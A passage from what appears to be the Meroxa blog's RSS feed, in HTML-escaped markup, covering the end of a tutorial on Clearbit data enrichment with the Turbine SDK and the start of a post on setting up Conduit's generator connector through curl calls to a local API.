        err &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Payload&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;location&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; UserDetails&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Location&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        err &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Payload&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;role&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; UserDetails&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Role&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        err &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Payload&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;seniority&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; UserDetails&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Seniority&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        	log&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Println&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;error setting value: &quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
            &lt;span class=&quot;token keyword&quot;&gt;break&lt;/span&gt;
        &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
        
        rr&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;i&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; r
   &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
   
   &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; rr
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Testing Locally and Deploying to Production&lt;/h3&gt;
&lt;p&gt;Modify your &lt;code class=&quot;language-text&quot;&gt;app.json&lt;/code&gt; to match your resource name and fixture file location. In this example, our fixtures are in &lt;code class=&quot;language-text&quot;&gt;fixtures/pg.json&lt;/code&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token string-property property&quot;&gt;&quot;resources&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token string-property property&quot;&gt;&quot;pg_db&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;fixtures/pg.json&quot;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The &lt;code class=&quot;language-text&quot;&gt;pg.json&lt;/code&gt; file should have a property that matches the collection specified in &lt;code class=&quot;language-text&quot;&gt;app.go&lt;/code&gt;. In this example, we’re using &lt;code class=&quot;language-text&quot;&gt;user_activity&lt;/code&gt;. Our app will take the email address in the &lt;code class=&quot;language-text&quot;&gt;payload&lt;/code&gt; object, send it to Clearbit, and return the data we specified in &lt;code class=&quot;language-text&quot;&gt;clearbit.go&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Data record before running&lt;/strong&gt; &lt;code class=&quot;language-text&quot;&gt;meroxa apps run&lt;/code&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token string-property property&quot;&gt;&quot;payload&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token string-property property&quot;&gt;&quot;activity&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;registered&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;updated_at&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1643214353680&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;user_id&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;108&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;created_at&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1643214353680&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;deleted_at&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;null&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;email&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;devaris@meroxa.io&quot;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;Data record after running&lt;/strong&gt; &lt;code class=&quot;language-text&quot;&gt;meroxa apps run&lt;/code&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token string-property property&quot;&gt;&quot;payload&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token string-property property&quot;&gt;&quot;activity&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;logged in&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;company&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Meroxa&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;created_at&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1643411169715&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;deleted_at&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;null&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;email&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;devaris@meroxa.io&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;full_name&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;DeVaris Brown&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;3&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;location&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Oakland, CA, US&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;role&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;leadership&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;seniority&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;executive&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;updated_at&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1643411169715&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;user_id&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;108&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;That looks good, so let’s deploy this data app into production by running &lt;code class=&quot;language-text&quot;&gt;meroxa apps deploy&lt;/code&gt;.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa apps deploy&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token output&quot;&gt;  Checking for uncommitted changes...
  ✔ No uncommitted changes!
  Validating branch...
  ✔ Deployment allowed from main branch!
  Preparing application &quot;meroxa-clearbit&quot; (golang) for deployment...
  ✔ Application built!
  ✔ Can access to your Turbine resources
  ✔ Application processes found. Creating application image...
  ✔ Platform source fetched!
  ✔ Source uploaded!
  ✔ Successfully built Process image! (&quot;fe983a75-fcb5-469f-a133-86647631ce85&quot;)
  ✔ Deploy complete!
  ✔ Application &quot;meroxa-clearbit&quot; successfully created!&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;And now we’re done!&lt;/p&gt;
&lt;h2&gt;Recap&lt;/h2&gt;
&lt;p&gt;This data app showed how easy data activation can be without requiring a user to stitch together a bunch of point solutions. With idiomatic code and the Meroxa Turbine SDK, we can now process and enrich data in real-time using the Clearbit API.&lt;/p&gt;
&lt;p&gt;If you’d like to see more data app examples, please feel free to make your request in our &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;Discord channel&lt;/a&gt;. Otherwise, Get started by &lt;a href=&quot;https://share.hsforms.com/1A4g2JcLMQpSGj-Z7bjx7uAc2sme&quot;&gt;requesting a free demo of Meroxa&lt;/a&gt; and build something cool. Your app could also be featured in our “Data App Spotlight” series.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Using Conduit to Generate Fake Data for Streaming Systems]]></title><description><![CDATA[Testing streaming systems and architectures can be difficult because you need to mock data and have an upstream system continuously push that mock data. Conduit has made it easier with a built in generator that creates fake data for streaming systems..]]></description><link>https://meroxa.com/blog/using-conduit-to-generate-fake-data-for-streaming-systems</link><guid isPermaLink="false">https://meroxa.com/blog/using-conduit-to-generate-fake-data-for-streaming-systems</guid><dc:creator><![CDATA[Haris Osmanagić]]></dc:creator><pubDate>Tue, 02 Aug 2022 13:23:52 GMT</pubDate><content:encoded>&lt;p&gt;Testing streaming systems and architectures can be difficult because you need to mock data and have an upstream system continuously push that mock data. This post is about how to set up Conduit’s data generator connector.&lt;/p&gt;
&lt;p&gt;The &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-generator&quot;&gt;generator connector&lt;/a&gt; is built into Conduit. You don’t need to download an external connector to get started. The connector has a number of capabilities like controlling the content it generates (a struct or a file), the format (structured payloads and raw payloads) and the amount and frequency of data generated. With this connector, you’ll be able to test the flow of data through your streaming systems.&lt;/p&gt;
&lt;h3&gt;The example&lt;/h3&gt;
&lt;p&gt;Our example will be a simple pipeline, with a generator source and a file destination. The generator source will be generating records, which will then be written to a file.&lt;/p&gt;
&lt;h3&gt;Setting up Conduit&lt;/h3&gt;
&lt;p&gt;We will use the &lt;a href=&quot;https://github.com/ConduitIO/conduit/pkgs/container/conduit&quot;&gt;Docker image&lt;/a&gt; in this example (you can also download a &lt;a href=&quot;https://github.com/ConduitIO/conduit/releases&quot;&gt;binary&lt;/a&gt; or you can &lt;a href=&quot;https://github.com/ConduitIO/conduit#build-from-source&quot;&gt;build the code&lt;/a&gt; yourself). Open up your terminal and run:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token output&quot;&gt;docker run -p 8080:8080 --rm  ghcr.io/conduitio/conduit:latest&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;That’s it, Conduit is up and running!&lt;/p&gt;
&lt;h3&gt;Creating the pipeline&lt;/h3&gt;
&lt;p&gt;We will use Conduit’s HTTP &lt;a href=&quot;https://github.com/ConduitIO/conduit#api&quot;&gt;API&lt;/a&gt; to create the pipeline:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token output&quot;&gt;curl -Ss -X POST &apos;http://localhost:8080/v1/pipelines&apos; -d &apos;
{
  &quot;config&quot;: {
  	&quot;name&quot;: &quot;my-pipeline&quot;,
    &quot;description&quot;: &quot;My pipeline&quot;
  }
}&apos; | jq -r .id&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We use jq here to pretty-print the output and more easily spot the pipeline ID, which we will use in the next steps. You’ll get something like this:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token string-property property&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;93d11532-504f-4591-b7b6-c130a54043ac&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token string-property property&quot;&gt;&quot;state&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;status&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;STATUS_STOPPED&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;error&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&quot;&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token string-property property&quot;&gt;&quot;config&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;name&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;my-pipeline&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;description&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;My pipeline&quot;&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token string-property property&quot;&gt;&quot;connectorIds&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token string-property property&quot;&gt;&quot;processorIds&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token string-property property&quot;&gt;&quot;createdAt&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;2022-07-12T18:54:33.778965128Z&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token string-property property&quot;&gt;&quot;updatedAt&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;2022-07-12T18:54:33.778965128Z&quot;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Creating the generator source&lt;/h3&gt;
&lt;p&gt;Run the following command to add a generator source to the pipeline.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token output&quot;&gt;curl -X POST &apos;http://localhost:8080/v1/connectors&apos; -d &apos;
{
  &quot;type&quot;: &quot;TYPE_SOURCE&quot;,
  &quot;plugin&quot;: &quot;builtin:generator&quot;,
  &quot;pipeline_id&quot;: &quot;93d11532-504f-4591-b7b6-c130a54043ac&quot;,
  &quot;config&quot;: {
    &quot;name&quot;: &quot;my-generator-source&quot;,
    &quot;settings&quot;: {
      &quot;format.type&quot;: &quot;structured&quot;,
      &quot;format.options&quot;: &quot;id:int,name:string,company:string,trial:bool&quot;,
      &quot;readTime&quot;: &quot;10ms&quot;,
      &quot;recordCount&quot;: &quot;5”
    }
  }
}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let’s go over the configuration options for the generator source in this example (also described in the &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-generator#configuration&quot;&gt;README&lt;/a&gt;):&lt;/p&gt;
&lt;p&gt;format.type and format.options&lt;/p&gt;
&lt;p&gt;These two parameters are both required and specify the contents of generated records. format.options has different meanings depending on format.type.&lt;/p&gt;
&lt;p&gt;format.type can be structured, raw or file. If structured is used, records with structured payloads will be generated. In that case, format.options needs to be a list of name-type pairs, where type can be one of int, string, time, bool. The generator above will create records with structured payloads, where we will have an ID integer field, a name field (of type string), a company field (of type string as well) and a trial field (of type boolean).&lt;/p&gt;
&lt;p&gt;Similar is true when format.type is raw. The only difference is that the structs will be serialized as JSON strings, and then converted to bytes.&lt;/p&gt;
&lt;p&gt;To use a file as the payload, we need to set format.type to file. format.options is then expected to be a file path.&lt;/p&gt;
&lt;p&gt;readTime&lt;/p&gt;
&lt;p&gt;Simulates time needed to read a record. In this example, records will be read every 10 milliseconds.&lt;/p&gt;
&lt;p&gt;recordCount&lt;/p&gt;
&lt;p&gt;The number of records which the generator will generate, or -1 for no limit. In our example, 5 records will be generated.&lt;/p&gt;
&lt;p&gt;burst.sleepTime and burst.generateTime&lt;/p&gt;
&lt;p&gt;These two options make it possible to simulate bursts. With this, the connector can sleep for burst.sleepTime (not generating any records), then generate records for burst.generateTime, and then ut will repeat the same cycle. The connector always starts with the sleeping phase. The cycles will end when recordCount has been reached, or never (if recordCount is set to -1).&lt;/p&gt;
&lt;p&gt;Example:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token string-property property&quot;&gt;&quot;readTime&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;1ms&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token string-property property&quot;&gt;&quot;burst.sleepTime&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;15s&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token string-property property&quot;&gt;&quot;burst.generateTime&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;30s&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token string-property property&quot;&gt;&quot;recordCount&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;2000&quot;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Here, the connector will sleep for 15s. Then it will be generating records for the next 30s. Every record will take 1ms to be generated. Once 30s are over, the same cycle will be repeated. recordCount is set to 2000, meaning that the cycles will stop after 2000 records have been generated.&lt;/p&gt;
&lt;h3&gt;Creating the file destination&lt;/h3&gt;
&lt;p&gt;Now let’s create a place for all the generated records to be written to. We’ll configure a file destination:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token output&quot;&gt;curl -C POST &apos;http://localhost:8080/v1/connectors&apos; -d &apos;
{
  &quot;type&quot;: &quot;TYPE_DESTINATION&quot;,
  &quot;plugin&quot;: &quot;builtin:file&quot;,
  &quot;pipeline_id&quot;: &quot;93d11532-504f-4591-b7b6-c130a54043ac&quot;,
  &quot;config&quot;: {
    &quot;name&quot;: &quot;my-file-destination&quot;,
    &quot;settings&quot;: {
      &quot;path&quot;: &quot;/home/conduitdev/projects/conduit/file-destination.txt&quot;
    }
  }
}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Starting the pipeline&lt;/h3&gt;
&lt;p&gt;Finally, let’s start the pipeline by executing the following command:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token output&quot;&gt;curl -X POST http://localhost:8080/v1/pipelines/93d11532-504f-4591-b7b6-c130a54043ac/start&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Checking the results&lt;/h3&gt;
&lt;p&gt;Since we’re generating only 5 records, and are simulating a 10-millisecond read time, we should be able to see the records in the destination pretty much instantaneously. If you check the contents of &lt;code class=&quot;language-text&quot;&gt;/home/conduitdev/projects/conduit/file-destination.txt&lt;/code&gt;, you should see something like this:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token string-property property&quot;&gt;&quot;company&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;string 1&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;token string-property property&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;1562668947&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;token string-property property&quot;&gt;&quot;name&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;string 1&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;token string-property property&quot;&gt;&quot;trial&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token boolean&quot;&gt;true&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token string-property property&quot;&gt;&quot;company&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;string 2&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;token string-property property&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;554929334&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;token string-property property&quot;&gt;&quot;name&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;string 2&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;token string-property property&quot;&gt;&quot;trial&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token boolean&quot;&gt;false&lt;/span&gt;&lt;span 